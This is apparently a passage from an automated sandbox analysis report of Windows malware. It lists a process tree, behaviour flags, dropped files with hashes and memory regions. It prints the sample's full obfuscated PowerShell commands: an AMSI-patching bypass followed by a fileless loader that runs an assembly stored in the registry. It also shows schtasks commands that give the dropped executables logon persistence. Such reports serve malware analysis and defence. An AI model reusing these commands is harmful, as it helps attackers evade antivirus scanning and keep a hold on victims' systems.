@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aTnmdkzefyW=$dzFGPcvPBLmbf.GetMethod('Get'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'el3'+'2'+'.'+[Char](100)+''+'l'+'l')));$jwoGPaYTbocwEI=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$aTnmdkzefyW,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+'a'+'r'+[Char](121)+'A')));$yfsbWtOgckkpFUfjH=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$aTnmdkzefyW,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$GSWMbZx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jwoGPaYTbocwEI,$FhInqOXfQgwxpYrhdeB).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$umzHjvqheltZKIngU=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$GSWMbZx,[Object]('Am'+'s'+'i'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$qBOkkggwGU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfsbWtOgckkpFUfjH,$DFzrmQMwlZsAUtAzmaXkvk).Invoke($umzHjvqheltZKIngU,[uint32]8,4,[ref]$qBOkkggwGU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$umzHjvqheltZKIngU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfsbWtOgckkpFUfjH,$DFzrmQMwlZsAUtAzmaXkvk).Invoke($umzHjvqheltZKIngU,[uint32]8,0x20,[ref]$qBOkkggwGU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QlglyWqbmtjf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DZGaThthGEAtMv,[Parameter(Position=1)][Type]$ZsRjgcnOvA)$PIIKxLDqlNR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+'T'+'y'+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d,'+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$PIIKxLDqlNR.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DZGaThthGEAtMv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+'e,'+'M'+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$PIIKxLDqlNR.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'ual',$ZsRjgcnOvA,$DZGaThthGEAtMv).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+'n'+'a'+'g'+[Char](101)+'d');Write-Output $PIIKxLDqlNR.CreateType();}$HXsVEoVQXfluK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'d'+'s'+'');$BFbSLDdFqCzMWB=$HXsVEoVQXfluK.GetMethod(''+[Char](71)+'e'+'t'+''+'P'+''+'r'+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ijaGfETXKpPnoJfgqqV=QlglyWqbmtjf @([String])([IntPtr]);$paEIgJnhNedrmecqvdXJqw=QlglyWqbmtjf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bFzVKiIoXbN=$HXsVEoVQXfluK.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le'+'H'+'a'+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dl'+[Char](108)+'')));$CDFPXeHLfGfETp=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$bFzVKiIoXbN,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$xXmVwaifUPCOMjlOM=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$bFzVKiIoXbN,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$pdGJEpP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CDFPXeHLfGfETp,$ijaGfETXKpPnoJfgqqV).Invoke('a'+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+'l'+''+'l'+'');$hsvYlCncmtmqUAqyM=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$pdGJEpP,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+'f'+[Char](101)+'r')));$uUViHHwxxv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xXmVwaifUPCOMjlOM,$paEIgJnhNedrmecqvdXJqw).Invoke($hsvYlCncmtmqUAqyM,[uint32]8,4,[ref]$uUViHHwxxv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hsvYlCncmtmqUAqyM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xXmVwaifUPCOMjlOM,$paEIgJnhNedrmecqvdXJqw).Invoke($hsvYlCncmtmqUAqyM,[uint32]8,0x20,[ref]$uUViHHwxxv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'st'+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Windows\Temp\__PSScriptPolicyTest_gejrha1l.a3z.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD58af28da34f963901dbe719f6b73a4a4f
SHA15ca890657e6c113120432c77e4747a38cd1d6321
SHA256c4534eef4b11858e01add1166d448abf619936548f8aa4627a7968da7ada7ba9
SHA512b512b243e88a8849caff65e6adc9b0772c65b87c81434e048594e7f871b1facc333dbf037577bfd8c9aa0a6145c62fc081253867d14cc7ce99745065c71043fd
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5efe0903424c927d3611f8d8acd078b79
SHA122fda4e644f8fa0908493f40b930b1dff1755356
SHA25679fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA5128de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9
-
memory/584-91-0x0000027952490000-0x00000279524BB000-memory.dmpFilesize
172KB
-
memory/584-97-0x0000027952490000-0x00000279524BB000-memory.dmpFilesize
172KB
-
memory/584-90-0x0000027952490000-0x00000279524BB000-memory.dmpFilesize
172KB
-
memory/584-89-0x0000027952460000-0x0000027952485000-memory.dmpFilesize
148KB
-
memory/584-98-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmpFilesize
64KB
-
memory/640-109-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmpFilesize
64KB
-
memory/640-102-0x000001F427F30000-0x000001F427F5B000-memory.dmpFilesize
172KB
-
memory/640-108-0x000001F427F30000-0x000001F427F5B000-memory.dmpFilesize
172KB
-
memory/740-119-0x000001F987C50000-0x000001F987C7B000-memory.dmpFilesize
172KB
-
memory/740-120-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmpFilesize
64KB
-
memory/740-113-0x000001F987C50000-0x000001F987C7B000-memory.dmpFilesize
172KB
-
memory/900-124-0x000002A27F080000-0x000002A27F0AB000-memory.dmpFilesize
172KB
-
memory/900-131-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmpFilesize
64KB
-
memory/900-130-0x000002A27F080000-0x000002A27F0AB000-memory.dmpFilesize
172KB
-
memory/1008-135-0x000002C8B5270000-0x000002C8B529B000-memory.dmpFilesize
172KB
-
memory/2256-73-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2256-86-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2256-74-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2256-78-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2256-82-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmpFilesize
1.9MB
-
memory/2256-83-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmpFilesize
696KB
-
memory/2256-75-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2256-76-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3660-6-0x0000000005670000-0x0000000005682000-memory.dmpFilesize
72KB
-
memory/3660-7-0x0000000005A60000-0x0000000005A9E000-memory.dmpFilesize
248KB
-
memory/3660-1-0x0000000000130000-0x000000000019C000-memory.dmpFilesize
432KB
-
memory/3660-2-0x0000000004EF0000-0x00000000053EE000-memory.dmpFilesize
5.0MB
-
memory/3660-3-0x0000000004A90000-0x0000000004B22000-memory.dmpFilesize
584KB
-
memory/3660-4-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/3660-5-0x0000000004B30000-0x0000000004B96000-memory.dmpFilesize
408KB
-
memory/3660-20-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/3660-0-0x0000000073AAE000-0x0000000073AAF000-memory.dmpFilesize
4KB
-
memory/4240-14-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/4240-13-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/4240-46-0x0000000006820000-0x000000000682A000-memory.dmpFilesize
40KB
-
memory/4240-1280-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/4240-1281-0x0000000073AA0000-0x000000007418E000-memory.dmpFilesize
6.9MB
-
memory/4384-71-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmpFilesize
1.9MB
-
memory/4384-72-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmpFilesize
696KB
-
memory/4384-25-0x000002B3F51C0000-0x000002B3F51E2000-memory.dmpFilesize
136KB
-
memory/4384-28-0x000002B3F54E0000-0x000002B3F5556000-memory.dmpFilesize
472KB
-
memory/4384-70-0x000002B3F5460000-0x000002B3F548A000-memory.dmpFilesize
168KB